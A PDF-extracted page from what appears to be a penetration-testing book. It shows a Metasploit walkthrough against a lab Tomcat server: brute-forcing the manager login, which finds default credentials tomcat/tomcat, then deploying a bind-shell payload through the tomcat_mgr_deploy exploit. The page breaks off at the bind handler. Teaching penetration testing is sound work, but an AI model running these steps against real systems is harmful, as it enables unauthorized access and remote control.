background image

Simulated Penetration Test

261

service.) After some more research on the operating version number of 
the Apache Tomcat installation running on the target, the Tomcat manager 
seemed the best route for compromising the system. If we can get through 
Tomcat’s manager function, we can use the HTTP 

PUT

 method to deploy our 

payload on the vulnerable system. We launch the attack as follows (with the 
list of exploits and payloads snipped):

msf > 

search apache

[*] Searching loaded modules for pattern 'apache'...

. . . SNIP . . .

msf auxiliary(tomcat_mgr_login) > 

set RHOSTS 172.16.32.162

RHOSTS => 172.16.32.162
smsf auxiliary(tomcat_mgr_login) > 

set THREADS 50

THREADS => 50
msf auxiliary(tomcat_mgr_login) > 

set RPORT 8180

RPORT => 8180
msf auxiliary(tomcat_mgr_login) > 

set VERBOSE false

VERBOSE => false
emsf auxiliary(tomcat_mgr_login) > 

run

[+] http://172.16.32.162:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] 
successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >

Our brute force attack is successful, and it logs in with the username 

tomcat

 and password 

tomcat

. But we don’t yet have a shell.

With our newly discovered credentials, we leverage Apache’s HTTP 

PUT

 

functionality with the 

multi/http/tomcat_mgr_deploy

 exploit to place our pay-

load on the system using the valid username and password that we discovered 
by brute-forcing the login.

auxiliary(tomcat_mgr_login) > 

use multi/http/tomcat_mgr_deploy

msf exploit(tomcat_mgr_deploy) > 

set password tomcat

password => tomcat
msf exploit(tomcat_mgr_deploy) > 

set username tomcat

username => tomcat
msf exploit(tomcat_mgr_deploy) > 

set RHOST 172.16.32.162

RHOST => 172.16.32.162
msf exploit(tomcat_mgr_deploy) > 

set LPORT 9999

LPORT => 9999
Msf exploit(tomcat_mgr_deploy) > 

set RPORT 8180

RPORT => 8180
msf exploit(tomcat_mgr_deploy) > 

set payload linux/x86/shell_bind_tcp

payload => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > 

exploit

[*] Using manually select target "Linux X86"
[*] Uploading 1669 bytes as FW36owipzcnHeUyIUaX.war ...
[*] Started bind handler